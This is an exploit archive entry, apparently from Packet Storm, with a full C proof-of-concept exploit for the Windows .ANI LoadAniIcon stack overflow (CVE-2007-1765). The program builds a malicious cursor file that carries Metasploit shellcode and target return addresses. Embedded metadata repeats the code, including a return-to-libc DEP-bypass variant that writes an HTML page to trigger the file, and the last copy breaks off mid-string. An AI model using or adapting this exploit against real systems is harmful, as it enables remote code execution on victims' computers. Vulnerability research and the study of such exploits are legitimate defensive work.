ID PACKETSTORM:55512 Type packetstorm Reporter devcode Modified 2007-04-02T00:00:00
Description
`/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
* A vulnerability has been identified in Microsoft Windows,
* which could be exploited by remote attackers to take complete
* control of an affected system. This issue is due to a stack overflow
* error within the "LoadAniIcon()" [user32.dll] function when rendering
* cursors, animated cursors or icons with a malformed header, which could
* be exploited by remote attackers to execute arbitrary commands by
* tricking a user into visiting a malicious web page or viewing an email
* message containing a specially crafted ANI file.
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Service Pack 4
* Microsoft Windows XP Service Pack 2
* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
* Microsoft Windows XP Professional x64 Edition
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 (Itanium)
* Microsoft Windows Server 2003 Service Pack 1
* Microsoft Windows Server 2003 Service Pack 1 (Itanium)
* Microsoft Windows Server 2003 x64 Edition
* Microsoft Windows Vista
*
* Microsoft Internet Explorer 6
* Microsoft Internet Explorer 7
*
* This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* For this to work on XP SP2 on explorer.exe, DEP has to be turned
* off.
*
*/
#include <iostream>
/* ANI Header */
unsigned char uszAniHeader[] =
"\x52\x49\x46\x46\x00\x04\x00\x00\x41\x43\x4F\x4E\x61\x6E\x69\x68"
"\x24\x00\x00\x00\x24\x00\x00\x00\xFF\xFF\x00\x00\x0A\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x01\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00"
"\x10\x00\x00\x00\x54\x53\x49\x4C\x03\x00\x00\x00\x02\x02\x02\x02"
"\x61\x6E\x69\x68\xA8\x03\x00\x00";
/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x69\x79\x6c\x4a"
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x35\x45\x6c\x4c"
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x4b\x70\x4f\x57"
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x39\x4c\x4b\x50"
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x79\x6e\x4c\x4d"
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x6d\x37\x71\x6f"
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x54\x72\x55\x7a"
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x76\x4c\x4b\x76"
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x6b\x4c\x4b\x65"
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x74\x46\x64\x78"
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x70\x4c\x45\x4f"
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x6b\x30\x70\x65"
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x59\x4c\x4b\x4d"
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x38\x57\x4c\x31"
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x58\x6e\x63\x69"
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x64\x63\x6f\x61"
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x4f\x4b\x57\x70"
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
char szIntro[] =
"\n\t\tWindows .ANI LoadAniIcon Stack Overflow\n"
"\t\t\tdevcode (c) 2007\n"
"[+] Targets:\n"
"\tWindows XP SP2 [0]\n"
"\tWindows 2K SP4 [1]\n\n"
"Usage: ani.exe <target> <file>";
typedef struct {
const char *szTarget;
unsigned char uszRet[5];
} TARGET;
TARGET targets[] = {
{ "Windows XP SP2", "\xC9\x29\xD4\x77" }, /* call esp */
{ "Windows 2K SP4", "\x29\x4C\xE1\x77" }
};
int main( int argc, char **argv ) {
char szBuffer[1024];
FILE *f;
if ( argc < 3 ) {
printf("%s\n", szIntro );
return 0;
}
printf("[+] Creating ANI header...\n");
memset( szBuffer, 0x90, sizeof( szBuffer ) );
memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );
printf("[+] Copying shellcode...\n");
memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );
printf("%s\n", argv[2] );
f = fopen( argv[2], "wb" );
if ( f == NULL ) {
printf("[-] Cannot create file\n");
return 0;
}
fwrite( szBuffer, 1, 1024, f );
fclose( f );
printf("[+] .ANI file succesfully created!\n");
return 0;
}
`
{"sourceHref": "https://packetstormsecurity.com/files/download/55512/devcode.txt", "sourceData": "`/* \n* Copyright (c) 2007 devcode \n* \n* \n* ^^ D E V C O D E ^^ \n* \n* Windows .ANI LoadAniIcon Stack Overflow \n* [CVE-2007-1765] \n* \n* \n* Description: \n* A vulnerability has been identified in Microsoft Windows, \n* which could be exploited by remote attackers to take complete \n* control of an affected system. This issue is due to a stack overflow \n* error within the \"LoadAniIcon()\" [user32.dll] function when rendering \n* cursors, animated cursors or icons with a malformed header, which could \n* be exploited by remote attackers to execute arbitrary commands by \n* tricking a user into visiting a malicious web page or viewing an email \n* message containing a specially crafted ANI file. \n* \n* Hotfix/Patch: \n* None as of this time. \n* \n* Vulnerable systems: \n* Microsoft Windows 2000 Service Pack 4 \n* Microsoft Windows XP Service Pack 2 \n* Microsoft Windows XP 64-Bit Edition version 2003 (Itanium) \n* Microsoft Windows XP Professional x64 Edition \n* Microsoft Windows Server 2003 \n* Microsoft Windows Server 2003 (Itanium) \n* Microsoft Windows Server 2003 Service Pack 1 \n* Microsoft Windows Server 2003 Service Pack 1 (Itanium) \n* Microsoft Windows Server 2003 x64 Edition \n* Microsoft Windows Vista \n* \n* Microsoft Internet Explorer 6 \n* Microsoft Internet Explorer 7 \n* \n* This is a PoC and was created for educational purposes only. The \n* author is not held responsible if this PoC does not work or is \n* used for any other purposes than the one stated above. \n* \n* Notes: \n* For this to work on XP SP2 on explorer.exe, DEP has to be turned \n* off. \n* \n*/ \n#include <iostream> \n \n/* ANI Header */ \nunsigned char uszAniHeader[] = \n\"\\x52\\x49\\x46\\x46\\x00\\x04\\x00\\x00\\x41\\x43\\x4F\\x4E\\x61\\x6E\\x69\\x68\" \n\"\\x24\\x00\\x00\\x00\\x24\\x00\\x00\\x00\\xFF\\xFF\\x00\\x00\\x0A\\x00\\x00\\x00\" \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \n\"\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\" \n\"\\x10\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\\x02\\x02\\x02\\x02\" \n\"\\x61\\x6E\\x69\\x68\\xA8\\x03\\x00\\x00\"; \n \n/* Shellcode - metasploit exec calc.exe ^^ */ \nunsigned char uszShellcode[] = \n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x49\\x49\\x49\\x49\\x49\\x49\" \n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x49\\x49\\x49\\x49\\x51\\x5a\\x6a\\x42\" \n\"\\x58\\x50\\x30\\x41\\x31\\x42\\x41\\x6b\\x41\\x41\\x52\\x32\\x41\\x42\\x41\\x32\" \n\"\\x42\\x41\\x30\\x42\\x41\\x58\\x50\\x38\\x41\\x42\\x75\\x38\\x69\\x79\\x6c\\x4a\" \n\"\\x48\\x67\\x34\\x47\\x70\\x77\\x70\\x53\\x30\\x6e\\x6b\\x67\\x35\\x45\\x6c\\x4c\" \n\"\\x4b\\x73\\x4c\\x74\\x45\\x31\\x68\\x54\\x41\\x68\\x6f\\x6c\\x4b\\x70\\x4f\\x57\" \n\"\\x68\\x6e\\x6b\\x71\\x4f\\x45\\x70\\x65\\x51\\x5a\\x4b\\x67\\x39\\x4c\\x4b\\x50\" \n\"\\x34\\x4c\\x4b\\x77\\x71\\x68\\x6e\\x75\\x61\\x4b\\x70\\x4e\\x79\\x6e\\x4c\\x4d\" \n\"\\x54\\x4b\\x70\\x72\\x54\\x65\\x57\\x69\\x51\\x49\\x5a\\x46\\x6d\\x37\\x71\\x6f\" \n\"\\x32\\x4a\\x4b\\x58\\x74\\x77\\x4b\\x41\\x44\\x44\\x64\\x35\\x54\\x72\\x55\\x7a\" \n\"\\x45\\x6c\\x4b\\x53\\x6f\\x51\\x34\\x37\\x71\\x48\\x6b\\x51\\x76\\x4c\\x4b\\x76\" \n\"\\x6c\\x50\\x4b\\x6e\\x6b\\x71\\x4f\\x67\\x6c\\x37\\x71\\x68\\x6b\\x4c\\x4b\\x65\" \n\"\\x4c\\x4c\\x4b\\x64\\x41\\x58\\x6b\\x4b\\x39\\x53\\x6c\\x75\\x74\\x46\\x64\\x78\" \n\"\\x43\\x74\\x71\\x49\\x50\\x30\\x64\\x6e\\x6b\\x43\\x70\\x44\\x70\\x4c\\x45\\x4f\" \n\"\\x30\\x41\\x68\\x44\\x4c\\x4e\\x6b\\x63\\x70\\x44\\x4c\\x6e\\x6b\\x30\\x70\\x65\" \n\"\\x4c\\x4e\\x4d\\x6c\\x4b\\x30\\x68\\x75\\x58\\x7a\\x4b\\x35\\x59\\x4c\\x4b\\x4d\" \n\"\\x50\\x58\\x30\\x37\\x70\\x47\\x70\\x77\\x70\\x6c\\x4b\\x65\\x38\\x57\\x4c\\x31\" \n\"\\x4f\\x66\\x51\\x48\\x76\\x65\\x30\\x70\\x56\\x4d\\x59\\x4a\\x58\\x6e\\x63\\x69\" \n\"\\x50\\x31\\x6b\\x76\\x30\\x55\\x38\\x5a\\x50\\x4e\\x6a\\x36\\x64\\x63\\x6f\\x61\" \n\"\\x78\\x6a\\x38\\x4b\\x4e\\x6c\\x4a\\x54\\x4e\\x76\\x37\\x6b\\x4f\\x4b\\x57\\x70\" \n\"\\x63\\x51\\x71\\x32\\x4c\\x52\\x43\\x37\\x70\\x42\"; \n \nchar szIntro[] = \n\"\\n\\t\\tWindows .ANI LoadAniIcon Stack Overflow\\n\" \n\"\\t\\t\\tdevcode (c) 2007\\n\" \n\"[+] Targets:\\n\" \n\"\\tWindows XP SP2 [0]\\n\" \n\"\\tWindows 2K SP4 [1]\\n\\n\" \n\"Usage: ani.exe <target> <file>\"; \n \ntypedef struct { \nconst char *szTarget; \nunsigned char uszRet[5]; \n} TARGET; \n \nTARGET targets[] = { \n{ \"Windows XP SP2\", \"\\xC9\\x29\\xD4\\x77\" }, /* call esp */ \n{ \"Windows 2K SP4\", \"\\x29\\x4C\\xE1\\x77\" } \n}; \n \nint main( int argc, char **argv ) { \nchar szBuffer[1024]; \nFILE *f; \n \nif ( argc < 3 ) { \nprintf(\"%s\\n\", szIntro ); \nreturn 0; \n} \n \nprintf(\"[+] Creating ANI header...\\n\"); \nmemset( szBuffer, 0x90, sizeof( szBuffer ) ); \nmemcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 ); \n \nprintf(\"[+] Copying shellcode...\\n\"); \nmemcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 ); \nmemcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 ); \n \nprintf(\"%s\\n\", argv[2] ); \nf = fopen( argv[2], \"wb\" ); \nif ( f == NULL ) { \nprintf(\"[-] Cannot create file\\n\"); \nreturn 0; \n} \n \nfwrite( szBuffer, 1, 1024, f ); \nfclose( f ); \nprintf(\"[+] .ANI file succesfully created!\\n\"); \nreturn 0; \n} \n`\n", "edition": 1, "references": [], "modified": "2007-04-02T00:00:00", "hash": "33df5dd7e5a708235bbb1fe69916d7761bcb3a83cf184fdd097399ebdb501245", "cvelist": ["CVE-2007-1765"], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/55512/devcode.txt.html", "description": "", "id": "PACKETSTORM:55512", "reporter": "devcode", "lastseen": "2016-12-05T22:19:41", "published": "2007-04-02T00:00:00", "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "vulnersScore": 6.8}, "objectVersion": "1.2", "type": "packetstorm", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c7d6a870f2e9a29172ad9e5983b6a669", "key": "cvelist"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "cadf423d1660b921da6dd71b8b509a8e", "key": "href"}, {"hash": "1f3013484776ab0ebd6e12dadc50bec3", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "1f3013484776ab0ebd6e12dadc50bec3", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0072e765ee070314826b7f41ce057b43", "key": "reporter"}, {"hash": "db7cb2a624f61e17d685c06086928f47", "key": "sourceData"}, {"hash": "c6760625bdd047b76d3a03119c47ae9c", "key": "sourceHref"}, {"hash": "e8164987774734bf0fc61e99606b9290", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "title": "devcode.txt", "viewCount": 2, "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}
{"cve": [{"lastseen": "2018-10-18T15:06:08", "references": ["http://www.securitytracker.com/id?1017827", "http://asert.arbornetworks.com/2007/03/any-ani-file-could-infect-you/", "http://www.microsoft.com/technet/security/advisory/935423.mspx", "http://vil.nai.com/vil/content/v_141860.htm", "http://www.vupen.com/english/advisories/2007/1151", "http://research.eeye.com/html/alerts/zeroday/20070328.html", "http://www.securityfocus.com/bid/23194", "http://www.avertlabs.com/research/blog/?p=230", "http://www.avertlabs.com/research/blog/?p=233", "http://www.securityfocus.com/archive/1/464345/100/0/threaded", "http://www.securityfocus.com/archive/1/464287/100/0/threaded"], "description": "Unspecified vulnerability in Microsoft Windows 2000 SP4 through Vista allows remote attackers to execute arbitrary code or cause a denial of service (persistent reboot) via a malformed ANI file, which results in memory corruption when processing cursors, animated cursors, and icons, a similar issue to CVE-2005-0416, as originally demonstrated using Internet Explorer 6 and 7. NOTE: this issue might be a duplicate of CVE-2007-0038; if so, then use CVE-2007-0038 instead of this identifier.", "edition": 3, "reporter": "NVD", "published": "2007-03-29T20:19:00", "title": "CVE-2007-1765", "type": "cve", "enchantments": {"score": {"modified": "2018-10-18T15:06:08", "vector": "NONE", "value": 9.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-1765"], "scanner": [], "modified": "2018-10-16T12:40:45", "cpe": ["cpe:/o:microsoft:windows_vista:::~~home_premium~~~", "cpe:/o:microsoft:windows_xp::sp2:~~media_center~~~", "cpe:/o:microsoft:windows_2003_server:-::~~web_edition~~~", "cpe:/o:microsoft:windows_2000::sp1:~~professional~~~", "cpe:/o:microsoft:windows_xp::sp2:~~tablet_pc~~~", "cpe:/o:microsoft:windows_vista:::~~december_ctp~~~", "cpe:/o:microsoft:windows_2000::sp3:~~server~~~", "cpe:/o:microsoft:windows_2000:-:sp2:~~professional~~~", "cpe:/o:microsoft:windows_vista:::~~home_basic~~~", "cpe:/o:microsoft:windows_2000:::~~server~~~:ja", "cpe:/o:microsoft:windows_xp::sp2:~~professional~~~", "cpe:/o:microsoft:windows_2000::sp4:~~server~~~", "cpe:/a:microsoft:ie:6", "cpe:/o:microsoft:windows_vista::beta1", "cpe:/o:microsoft:windows_vista:::~~business~~~", "cpe:/o:microsoft:windows_2000:::~~professional~~~", "cpe:/o:microsoft:windows_vista::beta", "cpe:/o:microsoft:windows_2000::sp1:~~datacenter_server~~~", "cpe:/o:microsoft:windows_2000::sp1:~~server~~~", "cpe:/h:avaya:s8100", "cpe:/o:microsoft:windows_2000::sp1:~~advanced_server~~~", "cpe:/a:avaya:ip600_media_servers", "cpe:/h:avaya:definity_one_media_server", "cpe:/o:microsoft:windows_2000::sp2:~~datacenter_server~~~", "cpe:/o:microsoft:windows_2000::sp3:~~datacenter_server~~~", "cpe:/h:avaya:s3400", "cpe:/o:microsoft:windows_2000::sp3:~~advanced_server~~~", "cpe:/o:microsoft:windows_2003_server:-::~~standard~~~", "cpe:/o:microsoft:windows_2000::sp4:~~professional~~~", "cpe:/o:microsoft:windows_vista:::~~~~x86~", "cpe:/o:microsoft:windows_2000::sp4:~~datacenter_server~~~", "cpe:/o:microsoft:windows_2003_server:-::~~enterprise~~~", "cpe:/o:microsoft:windows_2000::sp3:~~professional~~~", "cpe:/o:microsoft:windows_2000::sp2:~~server~~~", "cpe:/o:microsoft:windows_2000::sp2:~~advanced_server~~~", "cpe:/o:microsoft:windows_2000:::~~datacenter_server~~~", "cpe:/o:microsoft:windows_xp::sp2:~~home~~~", "cpe:/a:microsoft:ie:7.0::vista", "cpe:/o:microsoft:windows_2000:::~~advanced_server~~~", "cpe:/o:microsoft:windows_vista::beta2", "cpe:/o:microsoft:windows_vista:::~~enterprise~~~", "cpe:/o:microsoft:windows_2000::sp4:~~advanced_server~~~", "cpe:/o:microsoft:windows_2003_server:-::~~datacenter~~~"], "id": "CVE-2007-1765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1765", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T22:06:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2007-04-10T00:00:00", "type": "seebug", "title": "MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1765"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2007-04-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-6614", "id": "SSV:6614", "sourceData": "\n /*\r\n* version 0.5\r\n* Copyright (c) 2007 devcode\r\n*\r\n*\r\n*\t\t\t^^ D E V C O D E ^^\r\n*\r\n* Windows .ANI LoadAniIcon Stack Overflow For Hardware DEP XP SP2\r\n* [CVE-2007-1765]\r\n*\r\n*\r\n* Description:\r\n* A vulnerability has been identified in Microsoft Windows,\r\n* which could be exploited by remote attackers to take complete\r\n* control of an affected system. This issue is due to a stack overflow\r\n* error within the "LoadAniIcon()" [user32.dll] function when rendering\r\n* cursors, animated cursors or icons with a malformed header, which could\r\n* be exploited by remote attackers to execute arbitrary commands by\r\n* tricking a user into visiting a malicious web page or viewing an email\r\n* message containing a specially crafted ANI file.\r\n*\r\n* Hotfix/Patch:\r\n* None as of this time.\r\n*\r\n* Vulnerable systems:\r\n*\t Microsoft Windows 2000 Service Pack 4\r\n*\t Microsoft Windows XP Service Pack 2\r\n*\t Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)\r\n*\t Microsoft Windows XP Professional x64 Edition\r\n*\t Microsoft Windows Server 2003\r\n*\t Microsoft Windows Server 2003 (Itanium)\r\n*\t Microsoft Windows Server 2003 Service Pack 1\r\n*\t Microsoft Windows Server 2003 Service Pack 1 (Itanium)\r\n*\t Microsoft Windows Server 2003 x64 Edition\r\n*\t Microsoft Windows Vista\r\n*\r\n*\t Microsoft Internet Explorer 6\r\n*\t Microsoft Internet Explorer 7\r\n*\r\n* Tested on:\r\n* \t Microsoft XP SP2 + DEP + Internet Explorer 6\r\n*\r\n* This is a PoC and was created for educational purposes only. The\r\n* author is not held responsible if this PoC does not work or is\r\n* used for any other purposes than the one stated above.\r\n*\r\n*\tCredit goes to HOD (if he/they exist :P) for the html. Works on\r\n* XP SP2 with Hardware DEP enabled, go figure.\r\n*\r\n* ^^ shoutz to Wonk(if he exists r0fl), InTeL, thrasher :)\r\n*\r\n*\r\n*/\r\n#include <iostream>\r\n#include <windows.h>\r\n\r\n/* ANI Header */\r\nunsigned char uszAniHeader[] =\r\n"\\x52\\x49\\x46\\x46\\x00\\x04\\x00\\x00\\x41\\x43\\x4F\\x4E\\x61\\x6E\\x69\\x68"\r\n"\\x24\\x00\\x00\\x00\\x24\\x00\\x00\\x00\\xFF\\xFF\\x00\\x00\\x0A\\x00\\x00\\x00"\r\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\r\n"\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00"\r\n"\\x10\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\\x02\\x02\\x02\\x02"\r\n"\\x61\\x6E\\x69\\x68\\xA8\\x03\\x00\\x00";\r\n\r\n/* system("calc.exe"); */\r\nchar szExecute[] = "logoff.exe\\x00";\r\n\r\nunsigned char uszHtml[] =\r\n"<html>"\r\n"Microsoft Windows .ANI LoadAniIcon Exploit"\r\n"<br>Copyright (c) 2007 devcode<br>"\r\n"<style>" \\\r\n"* {CURSOR: url(\\"poc.ani\\")}</style></head>"\r\n"</html>";\r\n\r\n/* Usage: ani.exe 1*/\r\nchar szIntro[] =\r\n"\\n\\t\\tWindows .ANI LoadAniIcon Stack Overflow\\n"\r\n"\\t\\t\\tdevcode (c) 2007\\n"\r\n"[+] Targets:\\n"\r\n"\\t(0) Kernel32.dll (ExitProcess)\\n"\r\n"\\t(1) Windows XP SP2 + DEP\\n"\r\n"\\t(2) Windows 2003 Server\\n"\r\n"Usage: ani.exe <target>";\r\n\r\n/* RET2LIBC attack */\r\ntypedef struct {\r\n\tconst char *szTarget;\r\n\t/* kernel32.dll - set the proper stack frame\r\n\t\tLEA EBP, DWORD PTR SS:[ESP+10]\r\n\t\tSUB ESP, EAX\r\n\t\tPUSH EBX\r\n\t\tPUSH ESI\r\n\t\tPUSH EDI\r\n\t\t....\r\n\t\t....\r\n\t\tRETN\r\n\t*/\r\n\tunsigned char uszRet[5];\r\n\t/* msvcrt.dll - system() */\r\n\tunsigned char uszMsvcrtCall[5];\r\n} TARGET;\r\n\r\nTARGET targets[] = {\r\n\t{ "Kernel32.dll (ExitProcess)", "\\x90\\x90\\x90\\x90", "\\x90\\x90\\x90\\x90" },\r\n\t{ "Windows XP SP2", "\\xD6\\x24\\x80\\x7C", "\\xC7\\x93\\xC2\\x77" },\r\n\t{ "Windows 2003 Server", "\\x0A\\x17\\xE4\\x77", "\\x10\\x8C\\xBB\\x77" }\r\n};\r\n\r\nint main( int argc, char **argv ) {\r\n\tchar szBuffer[1024];\r\n\tFILE *f;\r\n\tvoid *pExitProcess[4];\r\n\r\n\tif ( argc < 2 ) {\r\n\t\tprintf("%s\\n", szIntro );\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tif ( atoi( argv[1] ) == 0 ) {\r\n\t\tprintf("[+] Getting ExitProcess address...\\n");\r\n\t\t*pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), \r\n"ExitProcess" );\r\n\t\tif ( pExitProcess == NULL ) {\r\n\t\t\tprintf("[-] Cannot get ExitProcess address\\n");\r\n\t\t\treturn 0;\r\n\t\t}\r\n\t\tmemcpy( targets[1].uszRet, pExitProcess, 4 );\r\n\t}\r\n\r\n\tprintf("[+] Creating ANI header...\\n");\r\n\tmemset( szBuffer, 0x90, sizeof( szBuffer ) );\r\n\tmemcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );\r\n\r\n\tprintf("[+] Copying execution code...\\n");\r\n\tmemcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );\r\n\tmemset( szBuffer + 136, 0, 4 );\r\n\tmemset( szBuffer + 204, 0, 4 );\r\n\tszBuffer[136] = 0x6C;\r\n\tszBuffer[204] = 0x6C;\r\n\tmemcpy( szBuffer + 196, targets[atoi(argv[1])].uszMsvcrtCall, 4 );\r\n\tmemcpy( szBuffer + 200, targets[atoi(argv[1])].uszMsvcrtCall, 4 );\r\n\tmemcpy( szBuffer + 240, szExecute, sizeof( szExecute ) - 1 );\r\n\r\n\tf = fopen( "poc.ani", "wb" );\r\n\tif ( f == NULL ) {\r\n\t\tprintf("[-] Cannot create ani file\\n");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tfwrite( szBuffer, 1, 1024, f );\r\n\tfclose( f );\r\n\tprintf("[+] .ANI file succesfully created!\\n");\r\n\r\n\tf = fopen( "poc.html", "wb" );\r\n\tif ( f == NULL ) {\r\n\t\tprintf("[-] Cannot create html file\\n");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tfwrite( uszHtml, 1, sizeof( uszHtml ), f );\r\n\tfclose( f );\r\n\tprintf("[+] HTML file succesfully created!\\n");\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-6614", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "poc"}, {"lastseen": "2017-11-19T22:06:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "No description provided by source.", "reporter": "Root", "published": "2007-03-31T00:00:00", "type": "seebug", "title": "MS Windows Animated Cursor (.ANI) Stack Overflow Exploit", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1765"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2007-03-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14192", "id": "SSV:14192", "sourceData": "\n /*\n* Copyright (c) 2007 devcode\n*\n*\n*\t\t\t^^ D E V C O D E ^^\n*\n* Windows .ANI LoadAniIcon Stack Overflow\n* [CVE-2007-1765]\n*\n*\n* Description:\n* A vulnerability has been identified in Microsoft Windows,\n*\t which could be exploited by remote attackers to take complete\n*\t control of an affected system. This issue is due to a stack overflow\n* error within the "LoadAniIcon()" [user32.dll] function when rendering\n* cursors, animated cursors or icons with a malformed header, which could\n*\t be exploited by remote attackers to execute arbitrary commands by\n* tricking a user into visiting a malicious web page or viewing an email\n* message containing a specially crafted ANI file.\n*\n* Hotfix/Patch:\n* None as of this time.\n*\n* Vulnerable systems:\n*\t Microsoft Windows 2000 Service Pack 4\n*\t Microsoft Windows XP Service Pack 2\n*\t Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)\n*\t Microsoft Windows XP Professional x64 Edition\n*\t Microsoft Windows Server 2003\n*\t Microsoft Windows Server 2003 (Itanium)\n*\t Microsoft Windows Server 2003 Service Pack 1\n*\t Microsoft Windows Server 2003 Service Pack 1 (Itanium)\n*\t Microsoft Windows Server 2003 x64 Edition\n*\t Microsoft Windows Vista\n*\n*\t Microsoft Internet Explorer 6\n*\t Microsoft Internet Explorer 7\n*\n* This is a PoC and was created for educational purposes only. The\n*\t author is not held responsible if this PoC does not work or is\n*\t used for any other purposes than the one stated above.\n*\n* Notes:\n*\t For this to work on XP SP2 on explorer.exe, DEP has to be turned\n*\t off.\n*\n*/\n#include <iostream>\n#include <windows.h>\n\n/* ANI Header */\nunsigned char uszAniHeader[] =\n"\\x52\\x49\\x46\\x46\\x00\\x04\\x00\\x00\\x41\\x43\\x4F\\x4E\\x61\\x6E\\x69\\x68"\n"\\x24\\x00\\x00\\x00\\x24\\x00\\x00\\x00\\xFF\\xFF\\x00\\x00\\x0A\\x00\\x00\\x00"\n"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"\n"\\x10\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00"\n"\\x10\\x00\\x00\\x00\\x54\\x53\\x49\\x4C\\x03\\x00\\x00\\x00\\x02\\x02\\x02\\x02"\n"\\x61\\x6E\\x69\\x68\\xA8\\x03\\x00\\x00";\n\n/* Shellcode - metasploit exec calc.exe ^^ */\nunsigned char uszShellcode[] 